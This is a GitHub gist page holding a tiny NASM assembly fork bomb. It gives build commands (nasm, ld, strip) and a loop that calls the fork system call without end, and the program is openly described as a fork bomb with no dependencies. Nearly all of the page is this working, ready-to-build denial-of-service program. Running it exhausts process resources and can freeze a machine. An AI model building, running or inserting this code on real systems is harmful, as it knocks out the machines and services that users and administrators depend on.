Skip to content

Instantly share code, notes, and snippets.

@crepererum
Last active March 2, 2021 18:01
Show Gist options
  • Save crepererum/8668353 to your computer and use it in GitHub Desktop.
Save crepererum/8668353 to your computer and use it in GitHub Desktop.
NASM Fork Bomb

#NASM Fork Bomb

This creates a very small pure binary fork bomb without external dependencies.

##Build:

Just run the following commands to build a standalone executable:

nasm fork.asm -felf64 -ofork.o
ld fork.o -ofork
strip fork
global _start
section .text
_start:
mov eax, 2
int 0x80
jmp _start
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment